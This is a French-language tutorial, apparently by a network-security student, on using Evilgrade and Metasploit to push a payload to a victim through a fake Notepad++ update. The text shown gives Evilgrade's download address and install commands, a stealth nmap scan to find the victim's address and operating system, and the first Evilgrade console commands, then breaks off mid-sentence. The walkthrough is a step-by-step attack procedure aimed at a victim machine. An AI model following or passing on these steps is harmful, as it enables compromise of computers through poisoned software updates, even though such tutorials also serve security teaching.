Jhgfdsq
Réalisé par OLIVIER Thomas étudiant en Master 2 Réseau et Sécurité Informatique a l'université Paris 5. Niveau : moyen, avancé Outils : Backtrack, Nmap, Metasploit, Airspoof, Dnsspoof , Evilgrade. Les outils Nmap, Metasploit, Airspoof, Dnsspoof sont déjà présents dans Backtrack, pour Evilgrade il est disponible à cette adresse http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz Installation de Evilgrade : – – Ouvrir un terminal Tapez les commandes : – – – tar zvxf isr-evilgrade-2.0.0.tar.gz cd isr-evilgrade-2.0.0-tar.gz/ ./evilgrade
Dans ce tutoriel nous allons apprendre à utiliser Evilgrade pour injecter un payload metasploit dans une « fausse mise à jour » de notepad++ -Installez Evilgrade comme montrer ci-dessus. Si l'erreur Can't locate Data/Dump.pm in @INC … survient utiliser la commande suivante : cpan Data::Dump puis recommencez la commande ./evilgrade -Une fois Evilgrade installer, avant de commencer effectuons un scan afin de trouver l'adresse ip de la victime ainsi que la version de son système d'exploitation ( laisser cette fenêtre de terminal ouverte , elle nous sera utile pour la suite du tutoriel). -Pour effectuer un scan nous allons utiliser nmap Dans notre exemple notre réseau est 192.168.0.0. -Utilisons donc la commande suivante : nmap -sS -O -T5 192.168.0.*
-Ici on effectue un scan furtif (stealth SYN scan) sur toutes les machines du réseau 192.168.0.0, la commande -O permet d'activer la visualisation du système d'exploitation et -T5 signifie la vitesse de scan( ici T5 est la vitesse maximale).
-Lancer Evilgrade Placez vous dans le dossier d'Evilgrade et tappez ./evilgrade -Utilisez la commande show modules dans la console Evilgrade, vous devez obtenir une liste de logiciels compatible Dans ce tutoriel nous allons utiliser l'outil Notepad++ -On tape donc la commande : configure notepadplus dans le terminal pour accéder au module notepad++. A ce moment nous connaissons donc l'adresse ip de la